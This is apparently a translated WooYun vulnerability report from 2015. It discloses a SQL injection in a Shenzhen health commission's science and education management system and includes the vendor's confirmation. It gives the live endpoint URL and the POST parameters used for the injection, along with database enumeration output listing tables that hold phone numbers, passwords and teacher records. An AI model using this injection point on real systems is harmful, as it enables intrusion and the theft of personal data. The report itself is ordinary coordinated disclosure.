
Vulnerability summary

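Bug ID: wooyun-2015-0112065

Title: SQL injection in a system of a Shenzhen municipal commission leads to the leak of over a thousand tables

Vendor: Guangdong Information Evaluation Center

Author: Yang

Submitted: 2015-05-22 12:05

Fixed: 2015-07-10 10:22

Disclosed: 2015-07-10 10:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; if you have questions or need help, contact [email protected]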



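Vulnerability details

Disclosure status:

2015-05-22: Details sent to the vendor; waiting for the vendor to handle them
2015-05-26: Vendor has confirmed; details disclosed to the vendor only
2015-06-05: Details disclosed to core white hats and experts in related fields
2015-06-15: Details disclosed to regular white hats
2015-06-25: Details disclosed to trainee white hats
2015-07-10: Details disclosed to the public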

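Brief description:

RT
What do I do now that my Dami phone is cracked
Only now do I realize that poor English is what really kills you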

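Detailed description:

The science and education management information system of the Shenzhen Municipal Health and Family Planning Commission
has a POST injection
http://ky.szhpfpc.gov.cn/main (POST)
method=login&fid=login&login_id=88952634&login=%EF%BF%BD%EF%BF%BD%C2%BC&password=8895263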



Let's take the holes one at a time, slowly

back-end DBMS: Microsoft SQL Server 2005
available databases [16]:
[*] Bsoft_HCN
[*] DB_CustomSMS_SGIP
[*] DB_CustomSmS_SMGP
[*] dcan
[*] jjm
[*] master
[*] mic
[*] model
[*] msdb
[*] sms
[*] sysoa
[*] SZDC
[*] tempdb
[*] WEBSERVER_SMS
[*] wsec
[*] zy


First database: [*] Bsoft_HCN [looks like a 创业软件 (Chuangye Software) product]

Database: Bsoft_HCN
[30 tables]

No idea what this stuff is


Second database
sms

[824 tables]


All of this is about SMS, I guess
| dbo.tbl_SMReceived | 535133 |
So that's five hundred thousand phone numbers leaked



users


It has email addresses, passwords and phone numbers too

Third database

back-end DBMS: Microsoft SQL Server 2005
Database: zy
[55 tables]


Proof of vulnerability:

Fifth database

Database: wsec
[65 tables]


Now look at sysoa

Database: sysoa
[64 tables]

The hospital table
contains the names and phone numbers of the major hospitals, as well as the leaders, their mobile numbers and so on



Seventh database

Database: mic
[106 tables]


There are records on more than twenty thousand teachers
| dbo.tech_teacher | 27474 |



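Anyway, there's every kind of information in here
Sheesh

Remediation:

Copyright notice: when reposting, please credit the source Yang@WooYun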


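Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-05-26 10:21

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the organization that manages the website to have it handled.

Latest status:

None yet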

